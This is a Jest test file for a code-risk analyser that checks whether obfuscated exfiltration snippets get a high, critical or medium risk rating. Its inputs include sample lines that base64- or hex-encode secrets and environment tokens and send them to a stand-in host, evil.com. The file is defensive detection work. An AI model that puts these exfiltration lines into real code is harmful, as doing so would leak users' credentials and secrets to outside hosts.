-
Notifications
You must be signed in to change notification settings - Fork 19
Expand file tree
/
Copy pathpatterns.test.ts
More file actions
79 lines (67 loc) · 3.37 KB
/
patterns.test.ts
File metadata and controls
79 lines (67 loc) · 3.37 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
import { analyzeContent } from '../index';
import { DANGEROUS_PATTERNS } from '../patterns';
describe('Obfuscation detection patterns', () => {
it('detects base64-encoded exfiltration', () => {
const code = `const data = btoa(secret); fetch('https://evil.com', { method: 'POST', body: data });`;
const result = analyzeContent(code, 'test');
expect(result.riskLevel).toBe('high');
});
it('detects base64-encoded env exfiltration (critical)', () => {
const code = `const payload = btoa(process.env.SECRET); fetch('https://evil.com', { body: payload });`;
const result = analyzeContent(code, 'test');
expect(result.riskLevel).toBe('critical');
});
it('detects hex-encoded exfiltration', () => {
const code = `const data = Buffer.from(secret, 'hex'); send(data);`;
const result = analyzeContent(code, 'test');
expect(result.riskLevel).toBe('high');
});
it('detects charCode obfuscation for exfiltration', () => {
const code = `const s = String.fromCharCode(97,98,99); fetch('/log?'+s);`;
const result = analyzeContent(code, 'test');
expect(result.riskLevel).toBe('high');
});
it('detects charCode-built credential exfiltration (critical)', () => {
const code = `const s = String.fromCharCode(...process.env.key.split('')); send(s);`;
const result = analyzeContent(code, 'test');
expect(result.riskLevel).toBe('critical');
});
it('detects string reversal obfuscation (simple)', () => {
const code = `const hidden = '密钥'.split('').reverse().join(''); send(hidden);`;
const result = analyzeContent(code, 'test');
expect(result.riskLevel).toBe('medium'); // maybe not high yet, but should be flagged
});
it('detects concatenation obfuscation with env', () => {
const code = `const p1 = process.env.A; const p2 = 'x'; const p3 = 'y'; fetch('/?'+p1+p2+p3);`;
const result = analyzeContent(code, 'test');
// Our current patterns may not catch this; this test is for future pattern
// For now, ensure it doesn't error
expect(result).toHaveProperty('riskLevel');
});
it('detects atob decoding followed by send', () => {
const code = `const decoded = atob(encoded); fetch('https://evil.com', { body: decoded });`;
const result = analyzeContent(code, 'test');
expect(result.riskLevel).toBe('high');
});
it('detects Buffer.from with hex and env', () => {
const code = `const data = Buffer.from(process.env.TOKEN, 'hex'); http.request({ host: 'evil.com', body: data });`;
const result = analyzeContent(code, 'test');
expect(result.riskLevel).toBe('critical');
});
it('detects multiple charCode calls to build sensitive string', () => {
const code = `const s = String.fromCharCode(80,97,115,115) + String.fromCharCode(87,111,114,100); fetch('/?'+s);`;
const result = analyzeContent(code, 'test');
expect(result.riskLevel).toBe('high');
});
it('detects string reversal obfuscation', () => {
const code = `const hidden = '密钥'.split('').reverse().join(''); send(hidden);`;
const result = analyzeContent(code, 'test');
expect(result.riskLevel).toBe('medium');
});
it('detects suspicious concatenation with env', () => {
const code = `const p1 = process.env.A; const p2 = 'x'; const p3 = 'y'; fetch('/?'+p1+p2+p3);`;
const result = analyzeContent(code, 'test');
// Our pattern may flag as medium
expect(result.riskLevel).toBe('medium');
});
});